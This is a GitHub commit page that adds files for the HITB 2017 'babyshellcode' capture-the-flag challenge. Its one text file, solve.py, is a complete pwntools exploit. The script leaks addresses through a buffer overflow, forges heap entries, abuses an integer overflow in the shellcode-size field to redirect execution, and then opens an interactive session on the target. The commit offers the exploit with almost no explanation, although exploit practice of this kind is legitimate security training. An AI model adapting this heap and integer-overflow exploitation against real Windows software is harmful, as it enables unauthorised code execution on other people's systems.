Commit d46a619

committed

windows interger overflow

1 parent b797270 commit d46a619Copy full SHA for d46a619

File tree

7 files changed

+73

-0

lines changed

HITB2017_babyshellcode

7 files changed

+73

-0

lines changed

`‎HITB2017_babyshellcode/babyshellcode.exe‎`

13.5 KB

Binary file not shown.

`‎HITB2017_babyshellcode/babyshellcode.idb‎`

341 KB

Binary file not shown.

`‎HITB2017_babyshellcode/scmgr.dll‎`

8.5 KB

Binary file not shown.

`‎HITB2017_babyshellcode/scmgr.idb‎`

212 KB

Binary file not shown.

`‎HITB2017_babyshellcode/solve.py‎`

Lines changed: 73 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,73 @@`
	`1`	`+from pwn import *`
	`2`	`+from time import sleep`
	`3`	`+import ctypes`
	`4`	`+context.log_level = "info"`
	`5`	`+context.bits = 32`
	`6`	`+`
	`7`	`+def add(sc):`
	`8`	`+ io.sendlineafter("Option:\r\n", '1')`
	`9`	`+ io.sendlineafter("shellcode size:\r\n", str(len(sc)))`
	`10`	`+ io.sendlineafter("shellcode name:\r\n", "name")`
	`11`	`+ io.sendlineafter("shellcode description:\r\n", "desc")`
	`12`	`+ io.sendlineafter("shellcode:\r\n", sc)`
	`13`	`+`
	`14`	`+def show():`
	`15`	`+ io.sendlineafter("Option:\r\n", '2')`
	`16`	`+`
	`17`	`+def delete(idx):`
	`18`	`+ io.sendlineafter("Option:\r\n", '3')`
	`19`	`+ io.sendlineafter("shellcode index:\r\n", str(idx))`
	`20`	`+`
	`21`	`+def run(idx):`
	`22`	`+ io.sendlineafter("Option:\r\n", '4')`
	`23`	`+ io.sendlineafter("shellcode index:\r\n", str(idx))`
	`24`	`+`
	`25`	`+io = remote("127.0.0.1", 1337)`
	`26`	`+`
	`27`	`+io.recvuntil("Global memory alloc at ")`
	`28`	`+rwe_heap = int(io.recvuntil("\r\n", drop = True), 16)`
	`29`	`+success("rwe_heap @ {:#x}".format(rwe_heap))`
	`30`	`+`
	`31`	`+# bof -> leak babyshellcode.exe@base`
	`32`	`+io.sendlineafter("leave your name\r\n", 'x' * 28)`
	`33`	`+io.recvuntil('x' * 28)`
	`34`	`+bin_base = u32(io.recvuntil("\r\n", drop = True).ljust(4, '0円')) - 0x1afa`
	`35`	`+success("bin_base @ {:#x}".format(bin_base))`
	`36`	`+allocsc_iat = bin_base + 0x30f8`
	`37`	`+success("allocsc@iat @ {:#x}".format(allocsc_iat))`
	`38`	`+Memory = bin_base + 0x53f8`
	`39`	`+success("Memory @ {:#x}".format(Memory))`
	`40`	`+`
	`41`	`+# forge heap`
	`42`	`+for i in xrange(19):`
	`43`	`+ add('padding0円')`
	`44`	`+add(flat(allocsc_iat, allocsc_iat, 0x20, allocsc_iat))`
	`45`	`+`
	`46`	`+# interger overflow ~= house of force`
	`47`	`+io.sendlineafter("Option:\r\n", '1')`
	`48`	`+fake_size = ctypes.c_int(0xffffffff + 1 - rwe_heap - 8 * 19 - 16 + Memory).value`
	`49`	`+# print("fake_size @ {}".format(fake_size))`
	`50`	`+assert fake_size < 0, "Try again!"`
	`51`	`+io.sendlineafter("shellcode size:\r\n", str(fake_size))`
	`52`	`+`
	`53`	`+delete(10)`
	`54`	`+delete(12)`
	`55`	`+`
	`56`	`+# add(flat(rwe_heap + 0x98, rwe_heap + 0x98))`
	`57`	`+add(flat(rwe_heap + 0x98))`
	`58`	`+show()`
	`59`	`+scmgr_base = u32(io.recvn(4)) - 0x1050`
	`60`	`+success("scmgr_base @ {:#x}".format(scmgr_base))`
	`61`	`+shellcode_test = scmgr_base + 0x1100`
	`62`	`+success("shellcode_test @ {:#x}".format(shellcode_test))`
	`63`	`+`
	`64`	`+# pause()`
	`65`	`+add(fit({`
	`66`	`+ 0x0: flat(shellcode_test),`
	`67`	`+ 0x4c: flat(0)`
	`68`	`+}, filler = flat(Memory)))`
	`69`	`+`
	`70`	`+run(19)`
	`71`	`+`
	`72`	`+io.interactive()`
	`73`	`+# io.close()`

`‎HITB2017_babyshellcode/ucrtbase.dll‎`

897 KB

Binary file not shown.

`‎HITB2017_babyshellcode/vcruntime140.dll‎`

81.8 KB

Binary file not shown.

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commit d46a619

File tree

7 files changed

7 files changed

`‎HITB2017_babyshellcode/babyshellcode.exe‎`

`‎HITB2017_babyshellcode/babyshellcode.idb‎`

`‎HITB2017_babyshellcode/scmgr.dll‎`

`‎HITB2017_babyshellcode/scmgr.idb‎`

`‎HITB2017_babyshellcode/solve.py‎`

`‎HITB2017_babyshellcode/ucrtbase.dll‎`

`‎HITB2017_babyshellcode/vcruntime140.dll‎`

0 commit comments